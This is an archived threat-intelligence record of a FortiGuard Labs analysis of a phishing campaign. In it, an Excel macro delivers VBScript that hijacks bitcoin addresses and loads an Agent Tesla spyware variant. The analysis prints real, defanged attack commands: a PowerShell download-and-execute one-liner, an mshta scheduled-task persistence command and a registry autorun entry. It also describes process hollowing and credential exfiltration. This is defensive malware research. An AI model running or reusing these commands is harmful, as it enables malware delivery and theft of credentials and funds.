{ "id": "71f90994-1234-4c53-8c6f-c92654acfc2a", "created_at": "2026-04-06T00:06:43.817051Z", "updated_at": "2026-04-10T13:11:54.691273Z", "deleted_at": null, "sha1_hash": "7a98212ea6275ca0384416efae06d8c565141267", "title": "Phishing Malware Hijacks Bitcoin Addresses and Delivers New Agent Tesla Variant | FortiGuard Labs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2652977, "plain_text": "Phishing Malware Hijacks Bitcoin Addresses and Delivers New\r\nAgent Tesla Variant | FortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2021-06-04 · Archived: 2026-04-05 17:02:53 UTC\r\nFortiGuard Labs recently captured a fresh phishing campaign in which a Microsoft Excel document attached to a\r\nspam email downloaded and executed several pieces of VBscript code. This malware is used to hijack bitcoin\r\naddress information and deliver a new variant of Agent Tesla onto the victim’s device. \r\nAgent Tesla, first discovered in late 2014, is a known spyware focused on stealing sensitive information from a\r\nvictim’s device, such as saved application credentials, keyboard inputs (keylogger), etc. We have posted a number\r\nof detailed analysis blogs for Agent Tesla campaign captured by FortiGuard Labs over the past several year. \r\nAffected platforms:      Microsoft Windows \r\nImpacted parties:         Windows Users\r\nImpact:                          Sensitive Information Collection from Victim’s Device\r\nSeverity level:               Critical\r\nInterestingly, Agent Tesla is a commercial software that is sold online, as shown in Figure 1.1, below.\r\nFigure 1.1 - Agent Tesla for sale on a webpage\r\nhttps://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nPage 1 of 16\n\nOn the website shown above, attackers can purchase it anonymously using the payment methods of \"Perfect\r\nMoney\" or \"Bitcoin Payment\".\r\nI conducted research on this latest phishing campaign, and in this post I will share my findings on how the\r\ncampaign is started, what the Macro within the attached Microsoft Excel does and how it is executed, as well as\r\nhow it performs bitcoin address hijack and delivers a new variant of Agent Tesla onto the victim’s device.\r\nAnalysis of the Excel File from the Phishing Email\r\nFigure 2.1 – The spam email content\r\nAs you may have noticed in Figure 2.1, the subject has been marked with “SPAM detected by FortiMail” to notify\r\nthe customer that the email is a spam. The email asks the recipient to open the attached Microsoft Excel file to\r\nview the details of a document entitled “Order Requirements and Specs.” Once the victim opens the file in\r\nMicrosoft Excel program, however, a security notice warning pops up, as shown in Figure 2.2, because the Excel\r\ndocument contains a Macro.\r\nhttps://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nPage 2 of 16\n\nFigure 2.2 – Warning when opening the attached Excel document\r\nThis is an empty Excel document, whose sheets are hidden. It also contains a password protected VBA project\r\n(Macro). I figured this out by modifying its binary data. The VBA project has a predefined method,\r\nWorkbook_BeforeClose(), that is automatically called when the victim closes the document.\r\nWhen called, it displays two UserForms with the string “ERROR!” one by one. When the second form is closed, it\r\nexecutes a piece of code loaded from an OptionButton’s tag property. As you can see in Figure 2.3, it is about to\r\nexecute “Shell# UserForm2.OptionButton1.Tag” (where the last \"_\" in Figure 2.3 is a kind of line-continuation\r\ncharacter) to run the command-line command \"mshta hxxp://www[.]j[.]mp/ais1kdoaksodjasod14\", which was\r\nloaded from the property “UserForm2.OptionButton1.Tag”.\r\nhttps://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nPage 3 of 16\n\nFigure 2.3 – Running a command loaded from a property value\r\n“mshta.exe” file is a software component of the Microsoft HTML Application Host, a utility responsible for\r\nexecuting HTA (HTML Application) files in Windows OS. An HTA file is a Microsoft Windows program whose\r\nsource code consists of HTML, Dynamic HTML, and scripting, such as VBScript or JScript.\r\nThe URL “hxxp://www[.]j[.]mp/ais1kdoaksodjasod14” is redirected to “hxxp://bit[.]ly/ais1kdoaksodjasod14” and\r\nfinally, is redirected to “hxxps://p8hj[.]blogspot[.]com/p/27.html” (“27.html”). As you may have guessed, the\r\nresponse from “27.html” contains malicious code, VBScript code for this case, which is encoded by the escape()\r\nfunction.\r\nThere are three segments of VBScript code in the response from “27.html”. Figure 2.4 highlights the three\r\nsegments of VBScript code that will be decoded and executed within the process “mshta.exe”. In the next section,\r\nI will demonstrate what the three segments of VBScript code do.\r\nhttps://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nPage 4 of 16\n\nFigure 2.4 – Three pieces of VBScript code in “27.html”\r\nThree Segments of VBScript Code\r\n1. Overview of the new Agent Tesla variant, the Auto-Run Group, and Task Scheduler\r\nhttps://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nPage 5 of 16\n\nFigure 3.1 – Un-escaped the first VBScript code\r\nAfter calling unescape() twice to the first segment of VBScript code, we finally obtain HTML content, as shown\r\nin figure 3.1. This content contains a piece of VBScript code that performs the three tasks shown below: \r\nDownloads PowerShell files to deliver the new Agent Tesla variant\r\nIt calls the VBScript method MicrosoftWINdows.Run() with the following parameter.\r\n\"cmd /c start /min PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('hxxps://ia601500[.]us[.]archive[.]org/9/items/FTp-120-May12/27-1.txt') -useB);i'E'x(iwr(' hxxps://ia601500[.]us[.]archive[.]org/9/items/FTp-120-May12/27-2.txt') -\r\nuseB);i'E'x(iwr(' hxxps://ia801500[.]us[.]archive[.]org/9/items/FTp-120-May12/27-3.txt') -useB)\"\r\nIt then runs PowerShell to execute three PowerShell files downloaded from three URLs. There are two EXE files\r\nstored in two huge arrays inside each downloaded PowerShell file. \r\nThe two EXE files are a loader of Agent Tesla and a new variant of Agent Tesla. Below is a segment of code\r\nextracted from “27-1.txt” as an example to explain how it loads Agent Tesla.\r\n[Reflection.Assembly]::Load($Cli555).GetType('WpfControlLibrary1.LOGO').GetMethod('Run').Invoke($null,\r\n[object[]] ('C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe',$Cli444));\r\nAs you can see, it loads the loader from the array $Cli555, which has a function called\r\n“WpfControlLibrary1.LOGO.Run()” requiring two parameters. It runs a normal EXE file (“MSBuild.exe”), then\r\ndeploys the new Agent Tesla variant stored in the huge array $Cli444 into it and executes. This means Agent Tesla\r\nwill run within “MSBuild.exe”—which is also a way to protect Agent Tesla from being detected by the victim. I’ll\r\nexplain the details of “WpfControlLibrary1.LOGO.Run()” later.\r\nhttps://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nPage 6 of 16\n\nThe VBScript code adds numerous items into the Auto-Run group in the system registry\r\nFigure 3.2 shows a screenshot of the Auto-Run group in the system registry of an infected system. It creates a\r\nWMI (Windows Management Instrumentation) Object to add into the Auto-Run group by calling its function\r\n“SetStringValue()”.\r\nFigure 3.2 – Auto-run group in system registry\r\nCreates a scheduled task\r\nBesides adding items into the Auto-Run group, it adds a scheduled task in “Task Scheduler” to make the entire\r\ncampaign work effectively.\r\nBelow is the code used to run “schtasks” to create a new scheduled task. The new task name is\r\n“WIND0WSUPLATE”. Its action is to execute command “mshta\r\nhxxp://1230948%1230948@getyournewblog[.]blogspot[.]com/p/27.html” and it’s called every 80 minutes.\r\nMicrosoftWINdows.run \"schtasks /create /sc MINUTE /mo 80 /tn \\\"WIND0WSUPLATE\\\" /F /tr \\\"MsHtA\\\"\r\n\\\"hxxp://1230948%1230948@getyournewblog[.]blogspot[.]com/p/27.html\\\"\" ,0\r\n2. Hijacking a Bitcoin address on the victim’s device\r\nAfter being decoded, we then obtained the second piece of VBScript code. Executing it saves a batch of\r\nPowerShell code into the system registry under the subkey \"HKCU\\Software\\nasdnasndnad\". It also adds an item\r\nto execute this PowerShell code into the Auto-Run group in the system registry, causing it to run at system startup\r\n(refer to the item “replcia” in Figure 3.2).\r\nTo do so, it executes the following code. \r\nMicrosoftWINdows.RegWrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\replcia\", \"mshta\r\nvbscript:Execute(\"\"CreateObject(\"\"\"\"Wscript.Shell\"\"\"\").Run \"\"\"\"powershell ((gp\r\nHKCU:\\Software).nasdnasndnad)|IEX\"\"\"\", 0 : window.close\"\")\", EXCELX\r\nhttps://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nPage 7 of 16\n\nGoing through the PowerShell code we can see it performs a bitcoin address hijack. It does this by continually\r\ndetecting the data on the system clipboard. If it’s a valid bitcoin address, it replaces the bitcoin address with\r\nattacker’s. To do so it uses a “while” statement and a function to check if a string is a valid bitcoin address. The\r\nwhile statement reads the system clipboard data from time to time by calling Get-Clipboard(). It then calls the\r\nfunction isBitcoinAddress() to determine if the data is a valid bitcoin address. If so, it then calls Set-Clipboard() to\r\nmodify the bitcoin address in the clipboard to the attacker’s, which in this case is\r\n“19VFGWgBkn6J3kMd8ApfCbtbNUmg8eBMvp”.  Figure 3.3 shows the PowerShell code used to hijack a\r\nbitcoin address.\r\nFigure 3.3 – Code to hijack a Bitcoin address\r\nUsually, people use the system clipboard to copy or paste the payee’s bitcoin address to make a payment. During\r\nthis time, this bitcoin hijack will change the payee’s bitcoin address to attacker’s. The victim remains unaware that\r\nhe/she paid their bitcoins to the wrong payee. \r\n3. Killing All Microsoft Excel and Word Processes\r\nThe decoded code for this segment is listed below. It runs the “taskkill” command to terminate all running\r\nMicrosoft Excel and Word programs. This can force kill the Excel.exe progress executing above the mshta.exe\r\ncommand.\r\n\u003cscript language=\"VBScript\"\u003e\r\nCreateObject(\"WScript.Shell\").Run \"taskkill /f /im Excel.exe\", 0\r\nCreateObject(\"WScript.Shell\").Run \"taskkill /f /im winword.exe\", 0 \r\nwindow.resizeTo 0, 0\r\nhttps://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nPage 8 of 16\n\nself.close\r\n\u003c/script\u003e\r\nAt this point we finished analyzing the first stage of this attack to explain what it is able to do with the three\r\nsegments of VBScript. Next, I will focus on the analysis of the loader and the new Agent Tesla variant that was\r\nstarted by the first segment of VBScript code.\r\nAnalysis of the Loader Progress of Agent Tesla\r\nAs I mentioned earlier, “mshta.exe” runs three segments of VBScript code in 27.html. The first one dynamically\r\nloads a .Net EXE (“the loader”) from an array ($Cli555) and calls its function WpfControlLibrary1.LOGO.Run()to\r\ndeploy the real Agent Tesla from another array onto the MSBuild.exe process.\r\nI manually extracted the loader to a local file and the Run() function is displayed in Figure 4.1 using dnSpy\r\ndebugger.\r\nFigure 4.1 – “WpfControlLibrary1.LOGO.Run()” to load Agent Tesla\r\nThe Run() function obtains the full path of a target process\r\n('C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe') and the binary data of the Agent Tesla\r\nvariant from the second parameter. It then calls another function, PEfX2B8Tl(), to deploy this Agent Tesla variant\r\nonto the target process. As you can see in Figure 4.1, I have simplified the function for a clearer view.\r\nIt first calls the API function CreateProcess() with CreateFlag 0x4 (CREATE_SUSPENDED) to create a\r\nsuspended MSBuild.exe process. It then calls a bunch of familiar API functions, such as GetThreadContext(),\r\nReadProcessMemory(), NtUnmapViewOfSection(), VirtualAllocEx(), WriteProcessMemory(),\r\nSetThreadContext(), and ResumeThread(). After that, Agent Tesla runs within the target process “MSBuild.exe”.\r\nhttps://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nPage 9 of 16\n\nTo show you the entire picture of the malicious process that started from the phishing campaign, I have attached a\r\nscreenshot of the Process Tree below, which shows all relevant processes involved in the campaign as well as the\r\nrelationship between these processes.\r\nFigure 4.2 – Process Tree of all relevant processes of the campaign\r\nAgent Tesla Running Within MSBuild.exe Process to Steal Data\r\nI extracted this new Agent Tesla variant to a local file from the large array ($Cli444) for static analysis.\r\nAccording to Figure 5.1, below, we can see that this new variant is fully obfuscated, meaning it is able to protect\r\nits code from being easily analyzed by security researchers. \r\nThe class names, function names, and variable names are meaningless, as shown in Figure 5.1 (such as “A”, “a”,\r\n“B”, “b”, “C”, “c” and so on.) For instance, the entry point function of this variant is this— “A.b.A()”.\r\nhttps://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nPage 10 of 16\n\nFigure 5.1 – Obfuscated new variant of Agent Tesla\r\nWhen Agent Tesla starts in MSBuild.exe, it first checks to see if there is a duplicate Agent Tesla running. If one is\r\nfound, it is killed to keep only one instance running at the same time.\r\nOnce every time it runs, it steals the credentials of applications (like Web Browsers, FTP clients, IM, etc.) saved\r\non the infected device and sends the stolen data to the attacker.\r\nAccording to my research, it steals sensitive information from 73 different applications, which can be categorized\r\nby their features, as below: \r\nWeb Browsers: \r\n\"Chrome\", \"Firefox\", \"Edge\", \"Safari\", \"SRWare Iron\", \"CoolNovo\", \"QQ Browser\", \"UC Browser\", \"Elements\r\nBrowser\", \"QIP Surf\", \"Epic Privacy\", \"Amigo\", \"Coccoc\", \"Coowon\", \"Torch Browser\", \"Orbitum\", \"Yandex\r\nBrowser\", \"Sputnik\", \"Chedot\", \"Vivaldi\", \"Iridium Browser\", \"360 Browser\", \"Chromium\", \"Opera Browser\",\r\n\"Sleipnir 6\", \"Liebao Browser\", \"CentBrowser\", \"Brave\", \"Cool Novo\", \"Citrio\", \"Uran\", \"7Star\", \"Kometa\",\r\n\"Comodo Dragon\",\"K-Meleon\", \"FALKON\", \"IceCat\", \"Flock\", \"WaterFox\", \"PaleMoon\", \"UCBrowser\",\r\n\"IceDragon\", \"QQBrowser\", \"SeaMonkey\", \"BlackHawk\", \"CyberFox\"\r\nEmail Clients and Messenger Clients:\r\n\"Postbox\", \"Foxmail\", \"Eudora\", \"Mailbird\", \"Becky!\", \"Opera Mail\", \"Outlook\", \"Thunderbird\", \"eM Client\",\r\n\"IncrediMail\", \"Claws-mail\", \"The Bat!\", \"Pocomail\"\r\n\"Psi\", \"Trillian\"\r\nVPN, FTP Clients and Download Managers:\r\n\"DownloadManager\", \"jDownloader\", \"OpenVPN\", \"SmartFTP\", \"FTPGetter\", \"WS_FTP\", \"FileZilla\", \"CFTP\",\r\n\"FTP Navigator\", \"CoreFTP\", \"WinSCP\", \"FlashFXP\"\r\nhttps://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nPage 11 of 16\n\nFigure 5.2 shows the moment it has obtained sensitive data from Mozilla Firefox. This data contains user\r\ncredentials (UserName and Password), the application name “Firefox”, as well as the URLs where the credentials\r\nare saved. The data will then be sent to the attacker with magic flag “PW_”. I will elaborate on how the stolen data\r\nis sent to the attacker later.\r\nFigure 5.2 – Display of sensitive data stolen from Mozilla Firefox\r\nIt starts a thread function that is used to collect cookies files from some predefined web browsers. These collected\r\ncookies files are then compressed into a ZIP archive and sent to the attacker with the magic flag “CO_”. Figure\r\n5.3 is an example of such a ZIP archive, containing the cookies files collected from Mozilla Firefox and Google\r\nChrome on my test machine.\r\nhttps://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nPage 12 of 16\n\nFigure 5.3 – Tree view of one ZIP archive with collected cookies files\r\nIn addition to what I explained above, it also collects data from the system clipboard and the victim’s inputs (the\r\nkeylogger). It calls the API SetClipboardViewer() to register itself so it is able to receive notice once the clipboard\r\ndata is changed. It can then obtain and save clipboard data.\r\nThe attacker also enabled the keylogger feature in this variant. It sets a hook on the Windows message\r\nWH_KEYBOARD_LL (13) by calling the API function SetWindowsHookEx(), so it can receive all keyboard\r\nmessages when the victim types. Both data collected from the clipboard and through victim’s inputs are saved in\r\nhtml format in a global variable. Agent Tesla starts a Timer (being called every 20 minutes) to check if the global\r\nvariable has data, and if so, it sends its data to the attacker with the magic flag “KL_”. \r\nAs shown in Figure 5.4 is an example of the data collected from victim’s inputs and the clipboard that were\r\nextracted by me when it was sent to the attacker.\r\nhttps://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nPage 13 of 16\n\nFigure 5.4 – Example of collected keylogger and clipboard data\r\nAs you can see, this data contains basic information, including current time, User Name, Computer Name, OS\r\nversion, CPU type, and memory capacity. The keylogger data contains application name (“Google Chrome”),\r\napplication title (“New Tab – Google Chrome”), current time (05/21/2021 10:48:18), as well as victim’s inputs at\r\nthe second line. The clipboard data starts with a constant string “Copied Text:” and clipboard data at the second\r\nline.\r\nSending Stolen Data to the Attacker\r\nAgent Tesla supports several ways to send stolen data to its C2 server. They are over SMTP to send data to the\r\nattacker’s email address, over FTP to send the data to the attacker’s FTP server, and over HTTP POST to send the\r\ndata to attacker’s HTTP server. \r\nThe variant we captured uses FTP protocol’s STOR command (store) to submit the stolen sensitive data. \r\nAgent Tesla has several magic flags to identify what kind of the data is being reported. These are “PW_” for\r\ncredentials, “CO_” for cookies files, “KL” for keylogger and clipboard, and “SC_” for screenshot (not enabled in\r\nthis variant). The data file name consists of a magic flag, User Name, Computer Name, and current time. \r\nFigure 6.1 shows a screenshot of Wireshark displaying the data transportation process in an FTP-Data packet\r\n(with the magic flag “PW_”), where it contains stolen credentials saved in Firefox and FileZilla.\r\nhttps://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nPage 14 of 16\n\nFigure 6.1 – FTP packet with stolen credentials\r\nConclusion\r\nMost attackers like to spread malware in phishing emails. As a result, new phishing campaigns are detected every\r\nday by FortiGuard Labs. People should be more careful when opening files attached to email.\r\nThe one I just analyzed not only used a VBScript to hijack the victim’s clipboard but also delivered a new variant\r\nof Agent Tesla. In this post I walked through this campaign, beginning with how the malicious Macro inside an\r\nattached Microsoft Excel document is executed. I then elaborated on how the three VBScript code segments found\r\nin the response from 27.html work to perform a bitcoin address hijack and to launch a new variant of Agent Tesla.\r\nNext, I demonstrated what applications this variant could steal sensitive data from, and what kind of sensitive data\r\nAgent Tesla is interested in, including saved credentials, cookies files of some web browsers, keylogger data, and\r\nclipboard data. And finally, I introduced how the stolen data is submitted to the attacker using an FTP-DATA\r\npacket.\r\nFortinet Protections\r\nFortinet customers are already protected from this Agent Tesla variant with FortiGuard’s Web Filtering, Anti-Spamming, and AntiVirus services, as follow:\r\nThe related URLs listed in IOCs have been rated as \"Malicious Websites\" by the FortiGuard Web Filtering\r\nservice.\r\nThe phishing email has been marked as SPAM by FortiMail. The attached Excel file is detected as\r\n“VBA/Agent.WCN!tr” and blocked by the FortiGuard AntiVirus service.\r\nThe FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. The\r\nFortinet AntiVirus engine is a part of each of those solutions as well. As a result, customers who have these\r\nhttps://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nPage 15 of 16\n\nproducts with up-to-date versions are protected.\r\nWe also suggest our readers go through the free NSE training — NSE 1 – Information Security Awareness, which\r\nhas a module on Internet threats designed to help end users learn how to identify and protect themselves from\r\nphishing attacks.\r\nIOCs:\r\nURLs\r\nhxxp://www[.]j[.]mp/ais1kdoaksodjasod14\r\nhxxp://bit[.]ly/ais1kdoaksodjasod14\r\nhxxps://p8hj[.]blogspot[.]com/p/27[.]html\r\nhxxps://ia601500[.]us[.]archive[.]org/9/items/FTp-120-May12/27-1.txt\r\nhxxps://ia601500[.]us[.]archive[.]org/9/items/FTp-120-May12/27-2.txt\r\nhxxps://ia801500[.]us[.]archive[.]org/9/items/FTp-120-May12/27-3.txt\r\nhxxp://1230948%1230948@getyournewblog[.]blogspot[.]com/p/27.html\r\nhxxp://1230948%1230948@newblogset144[.]blogspot[.]com/p/27.html\r\nhxxp://1230948%1230948@firstblognew123[.]blogspot[.]com/p/27.html\r\nhxxp://1230948%1230948@papagunnakjdnmwdnwmndwm[.]blogspot[.]com/p/27.html\r\nSample SHA-256\r\n[Order Requirements and Specs.xls]\r\nF10D005B7997686E87BAEE766E5B28BE3386FE3BA9A557BD2042DCBA5414B740\r\n[Extracted new variant of Agent Tesla]\r\n6FED3E1D302B9DF7893248367ED06F8A4F5BA2D3B7547E3F49D1D00A7718A8B4\r\nReference:\r\nNew Agent Tesla Variant Spreading by Phishing\r\nLearn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard\r\nSecurity Subscriptions and Services portfolio.\r\nLearn more about Fortinet’s free cybersecurity training, an initiative of Fortinet’s Training Advancement Agenda\r\n(TAA), or about the Fortinet Network Security Expert program, Security Academy program, and Veterans\r\nprogram.\r\nSource: https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nhttps://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant" ], "report_names": [ "phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant" ], "threat_actors": [ { "id": "0661a292-80f3-420b-9951-a50e03c831c0", "created_at": "2023-01-06T13:46:38.928796Z", "updated_at": "2026-04-10T02:00:03.148052Z", "deleted_at": null, "main_name": "IRIDIUM", "aliases": [], "source_name": "MISPGALAXY:IRIDIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "75455540-2f6e-467c-9225-8fe670e50c47", "created_at": "2022-10-25T16:07:23.740266Z", "updated_at": "2026-04-10T02:00:04.732992Z", "deleted_at": null, "main_name": "Iridium", "aliases": [], "source_name": "ETDA:Iridium", "tools": [ "CHINACHOPPER", "China Chopper", "LazyCat", "Powerkatz", "SinoChopper", "reGeorg" ], "source_id": "ETDA", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434003, "ts_updated_at": 1775826714, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7a98212ea6275ca0384416efae06d8c565141267.pdf", "text": "https://archive.orkl.eu/7a98212ea6275ca0384416efae06d8c565141267.txt", "img": "https://archive.orkl.eu/7a98212ea6275ca0384416efae06d8c565141267.jpg" } }